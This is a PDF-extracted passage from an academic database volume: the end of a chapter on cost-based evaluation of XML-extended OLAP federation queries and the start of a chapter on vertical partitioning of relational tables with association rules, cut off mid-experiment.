In this example, we show how the physical plan in Figure 10 is evaluated step by step. Figure 13 shows (bottom-up) the operators in the order of execution and the items in the set TempTable during the evaluation. Before the evaluation starts, TempTable is empty, represented by the empty set at the bottom of the plan. The evaluation algorithm goes recursively down to the bottom of the plan tree and then evaluates the operators bottom-up. The first evaluated operator is the XML-transfer operator, τN[ANY]/Nl/P, which executes the INSERT INTO statement shown as follows. INSERT INTO tmp_population SELECT DISTINCT * FROM OPENXML(@hdoc, ‘/Nations/ Nation’,2) WITH( NationName varchar(25), Population float) WHERE NationName in (‘DK’, ‘CN’, ‘UK’)
Box 6.
2534
SELECT
*
INTO
tmp_facts
FROM
OPENQUERY( OLAP_SVR, SELECT
SUM(Quantity), Brand, Nation
FROM
TC
WHERE
Nation=‘DK’ OR Nation=‘UK’
GROUP BY
Brand, Nation)
Evaluating XML-Extended OLAP Queries Based on a Physical Algebra
The set TempTable then is updated with the first item TτN[ANY]/Nl/P, which is a two-tuple (Rτ, τN[ANY]/Nl/P), where the first element Rτ (shown in Table 5) is the temporary table, and the second is its creator, the operator τN[ANY]/Nl/P. In practice, a tuple T is implemented as a Java class containing (1) a string variable representing a table name or a query string, (2) an Operator object pointing at the creator, and (3) an integer specifying the type of the value assigned to the string (e.g., a table name or a query string). The table Rτ consists of the nation codes and their corresponding population data, which are used to rewrite the predicate N[ANY]/Nl/P < 30. After the inlining operator ιN[ANY]/Nl/P subTreeCost subTreeCost = tempCost
9) 10)
Op1 , …, Opn
if an operator
Op ′
same as
Op has not
been estimated before return generateOpCost( Op ) + subTreeCost ;
11) 12)
else
13) 14)
return the cost of
Op ′ + subTreeCost ;
}
the plan rooted at the operator Opi. Note that an optimization method is used at lines 10 and 11, such that the algorithm does not estimate the cost of an operator if the cost of an identical operator was estimated before. From the descriptions of the previous optimizer structure, we know that before the plan pruning phase, the enumerated plans from the first phase may contain the same operators. For example, the XML-transfer operator τN[ANY]/Nl/P in the physical plan in Figure 10 is always required by any physical plan to load the XML decoration
2537
Evaluating XML-Extended OLAP Queries Based on a Physical Algebra
values. Therefore, when the physical plans for all the enumerated logical plans are cost-estimated, the cost of the operators like τN[ANY]/Nl/P, which exist in many plans and have exactly the same parameters, can be estimated only once for the first time of the operator’s appearance. The function, generateOpCost, estimates the cost of the input operator and registers it in a hash table; therefore, later, when an identical operator is reached, an entry for the operator can be found in the hash table, and its cost can be used directly. For example, the cost estimation process for the physical plan in Figure 10 starts from the XML-transfer operator after the algorithm first goes down to the bottom. Since all the operators are on the same branch, the costs of the operators are accumulated as the cost estimation algorithm moves up to the top. Therefore, the cost of the plan is the sum of the costs of all the operators.
Cost Estimation of Operators In the current implementation, the cost of a physical operator is approximately the execution time of its evaluation method introduced earlier. The costs are rough estimations but effective enough to support the choice of relatively cheapest plan. The cost of an XML-transfer operator is approximated as the product of the XML-torelational data transfer rate and the size of the data to be loaded into the temporary component. Similarly, the cost of a dimension-transfer operator is the product of the size of the dimension values and the OLAP-to-relational data transfer rate. For an inlining operator, the construction of the new predicate is performed in memory, which takes a relatively trivial amount of time compared to I/O operations. Therefore, the cost of an inlining operator is approximately the time for performing lines 6, 11, or 15 of the transforming function in Figure 12 for the respective forms of the input predicate (i.e., the time for loading the required data from the temporary component into memory, which is the product of the size of the required data and the relational-to-memory transfer rate). 2538
The cost parameters (e.g., the transfer rates), are estimated through probing queries (Zhu & Larson, 1996) and stored as constants in metadata. Later, in a more advanced implementation, a dynamic statistics manager can be used to pose the inexpensive probing queries when the system load is low in order to determine the cost parameters. The cube operators, as described earlier, do not perform any operations against the real data except for constructing OLAP component queries, which is trivial in terms of execution time. The fact-transfer operator executes the constructed query; therefore, the fact-transfer operator’s cost shall include the processing time for the OLAP query. However, experiments have shown that the cost is spent mostly on data transfer between the temporary and the OLAP components for the facttransfer operators using the pass-though queries. Therefore, the cost of the fact-transfer operator is estimated as the data transfer time in a similar way to the XML-transfer operators, except that the size of the fact data to be transferred must first be estimated through the cube selection and generalized projection operators in the plan. The size of the fact data to be transferred is approximately the product of (1) the size of the original cube, which is approximately the size of the fact table; (2) the selectivity ratio of the cube selection; and (3) the roll-up fraction of the cube generalized projection, which is estimated by dividing the number of the distinct tuples after the projection with the original number of facts (Shukla, Deshpande, Naughton, & Ramasamy, 1996). For the case where no cube operators exist in a physical plan, the cost of a fact-transfer operator is the size of the original fact table divided by the OLAP-to-relational data transfer rate. The federation selection and generalized projection operators are implemented through SQL queries. Therefore, the cost of these operators is estimated as the cost of the composing SQL operations through the methods described in Elmasri and Navathe (2000) and in Silberschatz, Korth, and Sudarshan (2002). In the following, we present the experimental results in order to show
Evaluating XML-Extended OLAP Queries Based on a Physical Algebra
the performance of the federation query engine with the previous technologies.
of RAM, 30 GB of disk, and 4096MB of page file. The OS is Microsoft Windows 2000 server with SP4. The example cube used in the experiments is shown in Figure 1. The cube is based on about 100MB of data generated using the TPC-H benchmark. The following experiments observe the federation with respect to the effectiveness of the federation system. Thus, we compare the
PERFORMANCE STUDY The experiments were performed on a machine with an Intel Pentium III 800Mhz CPU, 512MB
Figure 16. Comparisons of the queries involving the federated, cached, or integrated 11.4MB XML data Fe d e ra te d
C a ch e d
In te g ra te d
1000
Evaluation Time (in seconds)
100
10
1 1
2
3
4
5
6
7
8 9 10 11 12 13 14 15 16 Q u e ry T yp e
Figure 17. Comparisons of the queries involving the federated or integrated 2KB XML data Fe d e ra te d
In te g ra te d
Evaluation Time (in seconds)
100
10
1 1
2
3
4
5
6
7
8
9
10 11 12 13 14 15 16
Q u e ry typ e
2539
Evaluating XML-Extended OLAP Queries Based on a Physical Algebra
performance when the external XML data is (1) in the XML component (federated), (2) in the local relational temporary component (cached), and (3) physically integrated in the OLAP cube itself (integrated). The performance of 16 different query types was measured. The query types all aggregate fact data but vary in (a) whether one or two dimensions is used in the query, (b) which dimensions are used, and (c) which levels in these dimensions are used. Two different XML documents were used: a large 11.4-MB document about orders and their priorities and a small 2-KB document about nations and their populations, both generated from the TPC-H benchmark. For the small document, the WHERE clause has a 10% selectivity. For the large one, the WHERE clause has a 0.1% selectivity. The selectivity does not affect the relative performance of the queries on the federated, cached, and integrated data originating from the same XML document, as long as the same selectivity is used. The bar charts in Figures 16 and 17 show the performance of the queries using the federated, cached, or integrated XML data. The X axis represents the query type, and the Y axis represents the execution time in seconds. As Figure 16 indicates, the cost of querying the federation exceeds the cost of querying the physical integration by a factor of 10 to 20. The Cached bars stay in between but much closer to the Integrated. The queries involving federated XML data are evaluated in three sequential tasks. First, load the XML data into the temporary component and rewrite the predicate. Second, perform the selection and aggregation in the OLAP component and then load the values into the temporary component. Third, generate the final result in the temporary component. The first task takes much more time (about 135 seconds) so the other two are relatively trivial. Therefore, the queries on federations seem to take approximately the same evaluation time. The queries involving cached XML data skip the
2540
first part of the first task and rewrite the predicates using the cached XML data, thereby boosting the execution speed. The queries referencing the dimension values that are the integrated XML data skip the first step and thereby are evaluated mostly in the OLAP component. The chart in Figure 17 demonstrates comparisons of queries on two other federated/integrated levels. The chart suggests that querying the logical federation with a virtual dimension has almost the same performance as on the physically integrated cube, when the amount of the XML data is small (i.e., a few kilobytes). Therefore, a federation involving such XML data can be queried just as if it were a local cube. However, when the XML documents grow larger and larger, retrieving XML values is becoming the bottleneck for processing the federation queries. Experiments have shown that the performance can be improved by caching the external data; that is, the XML data can be stored in relational tables, thereby reducing the time for decorating the cube for the queries using these data. Based on the strategies proposed by Pedersen et al. (2004) in handling external XML data sources under different circumstances, the cached XML data can be used by queries and can provide efficient access to external data for analysis, when, for example, the data is not out of date. In summary, the federation is good for a small amount of XML data. However, more efficient query performance can be gained by caching the external data locally, which will become the most common case in the applications of OLAP-XML federations. All in all, the logical approach can be a practical alternative for flexible online analysis involving external fast-changing data.
CONCLUSION AND FUTURE WORK Current OLAP systems have a common problem in physically integrating fast-changing data. As
Evaluating XML-Extended OLAP Queries Based on a Physical Algebra
external data most often will be available in XML format, a logical integration of OLAP and XML data is desirable. In this article, we present a robust OLAP-XML federation query engine with (1) a simplified logical query semantics yielding more compact and concise logical query plans for OLAP-XML federation queries; (2) a set of physical operators to model the actual query execution tasks precisely; (3) the query evaluation, including the adopted relational, multi-dimension database and XML techniques, component query construction and evaluation algorithms for physical operators and query plans; (4) query optimization, including the architecture of the optimizer and cost estimation of physical operators and plans; and (5) a performance study showing the effectiveness of our approach. We believe that we are the first to implement a robust query engine that analyzes, optimizes, and evaluates XML-extended OLAP queries. Also, we believe this article to be the first to describe the query evaluation of these queries, including the detailed techniques and algorithms. Future work will be focused on improving the query engine by developing more advanced query optimization techniques, cost estimation techniques, and query evaluation techniques (e.g., a more efficient search algorithm for query enumeration, more accurate cost formulas, and more efficient OLAP and XML data loading techniques). Furthermore, we will integrate the improved federation query engine into the business analysis products of a BI tool vendor: TARGIT.
ACKNOWLEDGMENT This work was supported by the Danish Technical Research Council under grant no. 26-02-0277.
REFERENCES Bae, K. I., Kim, J. H., & Huh, S. Y. (2003). Federated process framework in a virtual enterprise using an object-oriented database and extensible markup language. Journal of Database Management, 14(1), 27-47. Chawathe, S., Garcia-Molina, H., Hammer, J., Ireland, K., Papakonstantinou, Y., Ullman, J. D., et al. (1994, October). The TSIMMIS project: Integration of heterogeneous information sources. In Proceedings of IDS of Japan (pp. 7-18), Tokyo, Japan. Clark, J., & DeRose, S. (2005). XML path language (XPath). Retrieved May 10, 2005, from http://www.w3.org/TR/xpath Elmasri, R., & Navathe, S. B. (2000). Fundamentals of database systems. Menlo Park, CA: Addison-Wesley. Graefe, G. (1993). Query evaluation techniques for large databases. ACM Computing Surveys, 25(2), 73-170. Graefe, G., & McKenna, W. J. (1993, April 19-23). The volcano optimizer generator: Extensibility and efficient search. In Proceedings of ICDE (pp. 209-218), Vienna, Austria. Goldman, R., & Widom, J. (2000, May 16-18). WSQ/DSQ: A practical approach for combined querying of databases and the Web. In Proceedings of SIGMOD (pp. 285-296), Dallas, Texas, USA. Gu, J., Pedersen, T. B., & Shoshani, A. (2000, September 10-14). OLAP++: Powerful and easyto-use federations of OLAP and object databases. In Proceedings of VLDB (pp. 599-602), Cairo, Egypt. Hellerstein, J. M., Stonebraker, M., & Caccia, R. (1999). Independent, open enterprise data integration. IEEE Data Engineering Bulletin, 22(1), 43-49.
2541
Evaluating XML-Extended OLAP Queries Based on a Physical Algebra
IBM. (n.d.). Datajoiner. Retrieved May 10, 2005, from http://www-306.ibm.com/software/data/ datajoiner Lahiri, T., Abiteboul, S., & Widom, J. (1999, September 1-3). Ozone — Integrating semistructured and structured data. In Proceedings of DBPL (pp. 297-323), Kinloch Rannoch, Scotland.
TARGIT OLAP system. In Proceedings of ICDE (pp. 778-781), Boston, Massachusetts, USA. Pedersen, D., Riis, K., & Pedersen, T. B. (2002, July 24-26). XML-extended OLAP querying. In Proceedings of SSDBM (pp. 195-206), Edinburgh, Scotland.
Lenz, H., & Shoshani, A. (1997, August 11-13). Summarizability in OLAP and statistical data bases. In Proceedings of SSDBM (pp. 39-48), Olympia, Washington, USA.
Pedersen, T. B., Shoshani, A., Gu, J., & Jensen, C. S. (2000, November 6-11). Extending OLAP querying to external object databases. In Proceedings of CIKM (pp. 405-413), McLean, Virginia, USA.
Microsoft. (2002a). Passing queries from SQL server to a linked analysis server. Books Online, version 5.2.3790. Retrieved November 3, 2005, from http://msdn.microsoft.com/library/default. asp?url=/library/en-us/olapdmpr/prsql_4vxv.asp
Shukla, A., Deshpande, P., Naughton, J. F., & Ramasamy, K. (1996, September 3-6). Storage estimation for multidimensional aggregates in the presence of hierarchies. In Proceedings of VLDB (pp. 522-531), Bombay, India.
Microsoft. (2002b). Performing bulk load of XML data. Retrieved May 10, 2005, from http://msdn. microsoft.com/library/en-us/sqlxml3/htm/bulkload_7pv0.asp
Silberschatz, A., Korth, H. F., & Sudarshan, S. (2002). Database system concepts. New York: McGraw-Hill.
Microsoft. (2005a). COM: Component object model technologies. Retrieved May 10, 2005, from http://www.microsoft.com/com Microsoft. (2005b). Supported SQL SELECT syntax. Retrieved May 10, 2005, from http://msdn. microsoft.com/library/default.asp?url=/library/ en-us/olapdmpr/prsql_70e0.asp Nicolle, C., Yétongnon, K., & Simon, J. C. (2003). XML integration and toolkit for B2B applications. Journal of Database Management, 14(4), 33-58. Oracle. (2005). Gateways. Retrieved May 10, 2005, from http://www.oracle.com/gateways Pedersen, D., Pedersen, J., & Pedersen, T. B. (2004, March 30-April 2). Integrating XML data in the
Transaction Processing Performance Council. (2004). TPC-H. Retrieved May 10, 2005, from http://www.tpc.org/tpch Triantafillakis, A., Kanellis, P., & Martakos, D. (2004). Data warehouse interoperability for the extended enterprise. Journal of Database Management, 15(3), 73-84. Yin, X., & Pedersen, T. B. (2004, November 1213). Evaluating XML-extended OLAP queries based on a physical algebra. In Proceedings of DOLAP (pp. 73-82), Washington, DC. Zhu, Q., & Larson, P. A. (1996, September 25-27). Global query processing and optimization in the CORDS multidatabase system. In Proceedings of PDCS (pp. 640-646), Dijon, France.
This work was previously published in the Journal of Database Management, edited by K. Siau, Volume 17, Issue 2, pp. 85-116, copyright 2006 by IGI Publishing, formerly known as Idea Group Publishing (an imprint of IGI Global).
2542
2543
Chapter 8.9
Vertical Fragmentation in Databases Using Data-Mining Technique Narasimhaiah Gorla American University of Sharjah, UAE Pang Wing Yan Betty Hong Kong Polytechnic University, Hong Kong
ABSTRACT A new approach to vertical fragmentation in relational databases is proposed using association rules, a data-mining technique. Vertical fragmentation can enhance the performance of database systems by reducing the number of disk accesses needed by transactions. By adapting Apriori algorithm, a design methodology for vertical partitioning is proposed. The heuristic methodology is tested using two real-life databases for various minimum support levels and minimum confidence levels. In the smaller database, the partitioning solution obtained matched the optimal solution using exhaustive enumeration. The application of our method on the larger database resulted in the partitioning solution that has an improvement of 41.05% over unpartitioned solution and took less than a second to produce the solution. We
provide future research directions on extending the procedure to distributed and object-oriented database designs.
INTRODUCTION Vertical fragmentation (or partitioning) is a physical database design technique that is aimed at improving the access performance of user transactions. In vertical partitioning, a relation is split into a set of smaller physical files, each with a subset of the attributes of the original relation. The rationale is that database transactions normally require access only to subset of the attributes. Thus, if we can split the relation into sub files that closely match the requirements of user transactions, the access time for transactions reduces significantly.
Vertical Fragmentation in Databases Using Data-Mining Technique
The fragmentation problem is computationally complex. Consider a relational schema with N relations, with Ai attributes for relation i. A relation with A attributes can be partitioned in B(A) different ways (Hammer & Niamir, 1979), where B(A) is the Ath Bell number (for A=30, B(A) = 1015 ). Using exhaustive enumeration, the number of possible fragmentations for the N-relation schema is approximately B(A1)B(A2) ... B(AN). Yu, Chen, Heiss, and Lee (1992) find out that the number of attributes for base tables and views in a typical relational environment are 18 and 41, respectively. Even if we consider a small schema of 10 relations with 15 attributes per relation, the number of possible fragments is approximately (109)10 =1090. Since the problem is intractable, solving large problems requires the use of heuristic techniques. The objective of this research is to provide a general approach for vertically fragmenting a relation. Since the problem is computationally intractable, we use a heuristic procedure to solve the problem using association rules. Our approach is based on Apriori algorithm developed by Agarwal and Srikanth (1994). We believe that “association rules” provide a natural way to represent the linkage between attributes as implied by the database transactions, thus providing a convenient way of solving the problem. Though several authors have studied vertical partitioning problem in databases, there is no study that employed association rules approach. The objective of the research is to develop a methodology for attribute partitioning with the least database operating cost, given the characteristics of relations and database transactions. The application of our algorithm using standard database workload (Yu et al., 1992) on large database resulted in an improvement of 41% over unpartitioned solution. Our association rules-based algorithm took only a few second to produce the solution, since it is relatively less complex compared to other approaches. Furthermore, the application of our methodology
2544
on small problems yielded optimal solutions as obtained by exhaustive enumeration. The organization of the article is as follows. Section 2 provides related research in database partitioning. Section 3 provides background on association rules. Section 4 has the methodology for vertical partitioning using association rules. Section 5 contains experiments using the proposed method employing two real life data sets for various support and confidence levels. Section 6 has discussion on effectiveness of the proposed method. Section 7 deals with discussion of results and section 8 contains future research directions.
RELATED WORK IN VERTICAL PARTITIONING Because of the criticality of the database performance, several researchers have contributed enormously to vertical partitioning problem for over two decades. Database partitioning has been applied in centralized relational databases (Ceri, Navathe, & Wiederhold, 1983; Cornell & Yu, 1990; Hoffer & Severance, 1976; Ng, Gorla, Law, & Chan, 2003; Song & Gorla, 2000), distributed databases (Baiao et al, 2004; Cheng, Lee, & Wong, 2002; March & Rho, 1995; Ozsu & Valduriez, 1996;), Data Warehouse Design (Ezeife, 2001; Furtado, Lima, Pacitti, Valduriez, & Mattoso, 2005; Labio, Quass, & Adelberg, 1997), and Object-Oriented Database design (Fung, Karlapalem, & Li, 2002; Gorla, 2001). Hoffer and Severance (1976) consider the vertical partitioning problem by applying bond energy algorithm on similarity of attributes, which are based on access patterns of transactions. Their work was extended by Navathe, Ceri, Wiederhold, and Dou (1984) by presenting vertical partitioning algorithms for three contexts: a database stored on devices of a single type; in different memory levels; and a distributed database. They used af-
Vertical Fragmentation in Databases Using Data-Mining Technique
finity between attributes for partitioning, which is based on the number of disk accesses. An alternate graphical approach was proposed by Navathe and Ra (1989). Cornell and Yu (1990) use an optimal binary-partitioning algorithm to obtain vertical partitioning, which is iteratively applied to obtain more partitions. The study uses the number of data accesses to evaluate partitions. Chu and Leong (1993) develop a transaction-based approach to vertical partitioning, in which transaction rather than attribute is used as the unit of analysis. Song and Gorla (2000) used genetic algorithms to obtain solutions for vertical partitions and access paths simultaneously. They also use the number of disk accesses as the partitioning evaluation criterion. Ailamaki, Dewitt, Hill, adn Skounakis (2001) proposed Partition Attributes Across (PAX) model by improving cache performance, while Ramamurthy, Dewitt, and Su (2002) proposed fractured mirrors partitioning scheme based on Decomposition Storage Model and N-ary Storage Model. Ng et al (2003) propose genetic-algorithm based solution to the combined problem of vertical partitioning and tuple clustering in relational databases. There are also studies that use data partitioning in distributed databases, object-oriented databases, and data warehouse designs. For example, Cheng et al. (2002) use genetic search-based clustering algorithm on traveling salesman problem to obtain vertical partitions in distributed databases. With reference to object-oriented database design, Gorla (2001) used genetic algorithm to determine the instance variables that should be stored in each class/ subclass in a subclass hierarchy, so that the total cost of database operations is minimized. Fung et al. (2002) analyze vertical partitioning of classes/ subclasses in object-oriented databases for class composition hierarchy and subclass hierarchy and develop the associated cost functions for query processing under the cases of large memory and small memory availability. Partitioning has been applied in data warehouses in order to optimize OLAP queries by designing parallel
database clusters (Furtado et al., 2005) and to generate ROLAP data cubes based on optimized data partitioning technique (Chen, Dehne, Eavis, & Rau-Chaplin, 2006). Methods for selecting and materializing horizontally partitioned data warehouse views have been proposed in order to speed up the query response time and reduce data warehouse maintenance costs (Ezeife, 2001). While present research provides an association rules based methodology to solve vertical partitioning problem in centralized relational databases, the article also provides extension to apply the methodology to distributed and objectoriented database designs.
RELATED WORK IN ASSOCIATION RULES Data mining is a process of extraction of implicit information from databases (Chen, Han, & Yu, 1996; Frawley, Piatesky-Shapiro, & Matheus, 1991). Association Rules, a data-mining technique (Agarwal & Srikant, 1994), the formal definition of which is given as (Agarwal, Mannila, Srikant, Toivonen, & Verkamo, 1996) “given a finite multiset of transactions D, the problem of mining association rules is to generate all association rules that have support and confidence at least equal to the user-specified minimum support threshold (min_sup) and minimum confidence threshold (min_conf) respectively” (Tzanis & Berberidis, 2007). In other words, association rules can be represented by an expression of the form X Æ Y, where X, Y are sets of items and X ∩ Y = ∅. The rule X Æ Y has a support of s if s% of transactions contain both X and Y. The rule X Æ Y has a confidence of c, if c% of transactions (T) that contain X also contain Y. Thus, the confidence of the rule is Freq (X∩Y) / Freq (X). Confidence denotes the strength of implication, while support indicates the frequencies of occurrence of the rule”.
2545
Vertical Fragmentation in Databases Using Data-Mining Technique
Several approaches have been devised to extract association rules, such as, Apriori algorithm (Agarwal & Srikant, 1994), DHP (Park, Chen, & Yu, 1995), graph-based approach (Yen & Chen, 2001), itemset lattice structures (Zaki, 2000; Zaki & Hsiao, 2005), and multiple-level association rules (Han & Fu, 1999). Association rules have been applied in several contexts. For example, Bagui (2006) used association rules to determine the crime patterns based on the datacubes created using Structured Query Language (SQL) on the crime data obtained from an U.S. state. Tjioe and Taniar (2005) developed methods to extract association rules in data warehouses by focusing on aggregate data and applied their algorithms on repeatable predicate and on non-repeatable predicate. Tzanis and Berberidis (2007) propose a mining algorithm to discover association rules for mutually exclusive items (the presence of one item excludes the other) in transaction databases While the previous works related to association rules provides some background, we derive association rules from the transactions and use those rules to design partitioning schemes in databases so that minimum database operating cost is incurred by the transactions. We develop the corresponding cost function in order to assess the merit of the database partitions obtained using our algorithm.
formulae for transaction execution in a partitioned environment, and an algorithm to obtain vertical data partitioning. Based on the workload characteristics of relational databases (Yu, Chen, Heiss, & Lee, 1992), we generate the transaction load for our research. While the workload of a typical database (Yu et al., 1992) has 75.9% SELECT, 4.7% DELETE, 7.7% UPDATE and 11.7% INSERT, the transaction set in our experiments closely match these percentages. The proportion of transactions that use 1-5, 6-10 and 11-15 attributes are around 65%, 24% and 11%, respectively. Furthermore, we consider basic predicate type since it is the most commonly used.
Cost Formula The amount of data transferred and the number of disk accesses have been the most commonly used methods of evaluating partitioning schemes by previous researchers (e.g., Cheng et al, 2002; Cornell & Yu, 1990; Fung et al, 2002; Gorla, 2001). In our research, we do not include cost of index access and storage cost. We use the blocks estimate given in Yao (1977) as the basis for cost of query processing, in line with previous studies. If there are n records divided into m blocks and if k records satisfying a query are distributed uniformly among the m blocks, then the number of blocks accessed for the query = m(1 – (1 - 1/m)k ) (Yao, 1977). In the partitioned database, we apply this formula for each Segmenti accessed by the query q. Thus, the cost of processing a (retrieval) query q is estimated as shown in Box 1. Where
METHODOLOGY Our methodology consists of three steps: estimating the transaction load, deriving the cost
Box 1. ⎛ Segmentqj ⎞ freqq * ⎜ ⎛⎜ ∑ ⎢⎡ Mi (1 − (1 − 1/ Mi ) kq ⎤⎥ ⎞⎟ * 1 + (0.1* (Segmentqj − 1)) ⎟ ⎠ ⎝ ⎝ i =1 ⎠
(
2546
)
(1)
Vertical Fragmentation in Databases Using Data-Mining Technique
freqq = Frequency of query q Segmentqj = Number of partition j required by the query q. Mi = ⎢⎡T * Li / BS ⎥⎤
Mi kq T Li BS
= Number of blocks to be accessed in partition i. = Number of tuples satisfying a query q. = Total number of tuples = Size of a partition i in bytes = Block Size
The first part computes the total number of blocks to be accessed from each of the Segmentqj partitions. The second part indicates the overhead to concatenate Segmentqj partitions in the memory. Similarly, the cost of processing an insert/delete transaction q is estimated as: ⎛ Segmentqj ⎞ 2* freqq * ⎜ ∑ ⎡⎢ Mi (1 − (1 − 1/ Mi ) kq ⎤⎥ ⎟ ⎝ i =1 ⎠
(2)
As the insert/delete transactions involve two I/O times, the cost is multiplied by a 2.
Proposed Algorithm for Database Partitioning The rationale behind our algorithm is as follows. Let A and B be the attributes in a relation. If the confidence value of the rule A Æ B is greater than the predefined minimum (min_conf), then the association between attributes A and B is strong enough that they can be grouped into one partition. Since order of attributes within the same partition is of no significance, confidence values for A Æ B and B Æ A are calculated and the lower value will be selected to represent the association between attributes A and B, as a conservative approach. Thus, the confidence (A,B) = freq (A,B)/ Max (freq(A), freq(B)). The confidence value is higher when (i) there are fewer transactions requiring attribute A only or B only and/or (ii)
there are more transactions requiring both A and B. Thus, confidence provides further justification, in addition to minimum support (min_supp) for storing attributes A and B in the same partition. The proposed algorithm (see Figure 1) has the following steps: discovering large itemsets, filtering the itemsets, generating data partitions, and selecting the best partitioning scheme. Discovering Large Itemsets: Large itemsets are the combinations of attributes that have support above the predefined minimum support. For a retrieval transaction, the set of attributes in the SELECT clauses are considered; for an INSERT/DELETE transaction, all the attributes in the relation are used. Then large itemsets can be discovered by adapting the Apriori algorithm (Agarwal & Srikant, 1994) and adding transaction frequencies rather than counting transactions. The support of candidate in Ck is calculated by the sum of the frequency of queries that contain the candidate set. The set of large itemset Lk are derived that meet the predefined minimum support level (min_supp). Thus, inputs for this step are set of database transactions (retrievals and updates) T1..Tm, the transaction frequencies Freq1..Freqm, and predetermined support level min_supp. The outputs of this module are Large Itemsets L1 .. Lk. Filter Large Itemsets: Large itemsets with confidence value smaller than the predetermined minimum confidence (min_conf) are discarded. For each itemset of Large itemsets Lk, all possible association rules are generated and the corresponding confidence levels are computed. For the Association rule LHS Æ RHS, the confidence level is computed as total frequency of transactions that have both LHS and RHS divided by total frequency of transactions that have only LHS. Thus this step takes Large Itemsets (L1 .. Lk) and predetermined minimum confidence level (min_conf) as inputs and returns Filtered Large Itemsets (L’1 .. L’k). Deriving Vertical Partitions: After we generate Filtered Large itemsets L’1 …L’k, we start
2547
Vertical Fragmentation in Databases Using Data-Mining Technique
Figure 1. Database partitioning algorithm Inputs: Database Transaction Set T1..Tm Frequencies of database transactions: Freq1..Freqm Predetermined Minimum Support (min_supp) Predetermined Minimum Confidence (min_conf) Outputs: Optimal Database Partitioning Scheme p-opt Step 1: DiscoverLargeItemsets (T1..Tm, Freq1..Freqm, min_supp, L1 .. Lk ) Adapt Apriori Algorithm using T1..Tm and Freq1..Freqm /* the frequencies are added to determine the support level Generate Large Itemsets L1 .. Lk with support values >= min_supp Step 2: FilterLargeItemsets (L1 .. Lk , min_conf, L’1 .. L’k) Do for each itemset i in L1 .. Lk Calculate all possible confidence values Find the lowest confidence (LowConfi) IF LowConfi >= min_conf THEN retain itemset i ELSE discard itemset i End-Do Step 3: DeriveVerticalPartitions (L’1 .. L’k, Partioning schemes P1..Ps) Do for the Itemsets L’k .. L’1 Choose a non-overlapping itemset with the highest support Keep into partitioning scheme P End-Do Step 4: FindOptimalPartitioning (T1..Tm, P1..Ps, Popt) Do for each database partitioning scheme P ∈ P1..Ps Compute Total-Cost (P) = ∑ Cost (q) for q ∈ T1..Tm q
/* Cost (q) uses [Eq1] if q is Retrieval and [Eq2] if q is Update IF Total-Cost (P) < Min-DBCost THEN Min-DBCost Å Total-Cost (P) End-Do Returns Partitioning scheme Popt, a set of optimal database partitions
from the k-itemsets to determine the partitions. Make a partitioning scheme by picking an itemset from L’k and then by picking other itemset from L’k-1 … L’1 in that order so that they are disjoint. Continue like this the last items are picked from
2548
L’1. This makes one partitioning scheme. Repeat the above process until all possible partitioning schemes are derived. Thus, this module uses Filtered Large Itemsets L’1 …L’k as input and returns partitioning schemes P1..Ps. It should be
Vertical Fragmentation in Databases Using Data-Mining Technique
noted that each partitioning scheme may constitute several partitions. Find the optimal partitioning scheme: Calculate the database operating cost for a partitioning scheme P by computing cost for each transaction, using Equation 1 if transaction is retrieval and Equation 2 if transaction is update. Select the partitioning scheme Popt with the lowest database operating cost. Thus, the inputs for this module are partitioning schemes P1..Ps and transaction set T1..Tm and the output is the optimal partitioning scheme Popt.
Illustration The following illustrates the working of the partitioning algorithm. Consider the set of 5 transactions T1…T5 and their frequencies to operate on the relation with six attributes (see Table 1).
Generate Large Itemsets Lk Assuming a predetermined minimum support of 40% (i.e., min_supp is 4), Large itemsets Lk are generated by adapting Apriori algorithm. First, the Candidate 1-itemset C1 is derived by adding the frequencies of the transactions in which an attribute is used. For insert and delete transactions, it is assumed that all attributes are used since the entire row is to be accessed. For example, attribute A is used in transactions T1, T3, T4, and T5 with
frequencies 1, 3, 2, and 1 respectively. Thus the support for attribute {A} is 7. Large 1-itemset L1 is derived from Candidate 1-itemset C1 by eliminating itemsets with support < 4. The Candidate 2-itemset C2 is derived by concatenating L1 with L1 and finding the support levels by scanning the Transaction Set. For example, from L1, concatenating {A} and {B}, we find {A B} as one of the 2-itemsets C2. The support level for {A B} is obtained by adding the frequencies of transactions in which both A and B are used. These transactions are T1, T4, and T5 with frequencies 1, 2, and 1, respectively, resulting in the support level of 4 for {A B}. The above process is repeated until all Large itemsets are derived.
Filtering with Predetermined Confidence levels Each itemset in Large itemsets is kept only if the itemset has confidence level >= min_conf. As an example, consider the association {A,D,F}. The confidence value for the rule AÆ DF is computed as the number of transactions in which all the attributes A,D, and F are used (i.e., 6) divided by number of transactions in which A is used (i.e., 7). Thus, the confidence values for A Æ DF, D Æ AF and FÆ AD are 6/7, 6/6, and 6/6, respectively. Similarly the confidence values for DF Æ A, AFÆ D and AD Æ F are 6/6, 6/6, and 6/6, respectively. Since the lowest value (6/7 or 86%) is higher than the predefined minimum confidence level (say, min_conf is 30%), the association {A,D,F} is included in the Filtered Large 3-itemsets L’3.
Table 1. Database transaction set
Deriving Vertical Partitions No T1 T2
Transactions SELECT A, B, E SELECT B, E
T3
SELECT
T4 T5
INSERT SQL DELETE SQL
A, D, F
Frequency 1 3 3 2 1
The large itemset {A,D,F} is taken from L’3 as the one of the partitions (see Figure 2); then we go to L2 to scan 2-itemsets and find that there is only one {B E} that do not overlap with the existing partition. The remaining attribute {C} is taken from L1, resulting in the partitioning scheme C
2549
Vertical Fragmentation in Databases Using Data-Mining Technique
Figure 2. Generation of candidate itemsets, large itemsets, and filtered large itemsets Candidate 1-itemset C1 SupItemsets port {A} 7 {B} 7 {C} 3 {D} 6 {E} 7 {F} 6
Large 1-itemset L1 SupItemsets port {A} 7 {B} 7 {D} 6 {E} 7 {F} 6
BE ADF . Similarly, considering the other 3-item set {A,B,E} from L3, we obtain C DF ABE as the other solution. Out of these two partitioning schemes, the one that has the least database operating costs using equations Equation 1 and Equation 2 is selected as the best database partitioning scheme.
2550
Itemsets
Filtered Large L’2
L3 Support
Filtered Large L’1
IMPLEMENTATION Experiments have been conducted using the proposed methodology with two real-life databases (UCI, 1999). The first experiment uses Teaching Assistant Education (TAE) dataset with 6 attributes and 151 tuples. The second experiment
Vertical Fragmentation in Databases Using Data-Mining Technique
Speaker (A), Course_instructor (B), Course (C), Semester (D), Class_size (E), and Class_attribute (F). The block size is assumed to be 100 bytes. We generated 10 SELECT SQL (retrieval), one INSERT SQL and one DELETE SQL (Appendix A). We derived partitions using predefined minimum support levels (20%, 30%, 40%, 50% and 60%) and the predefined confidence levels (20%,
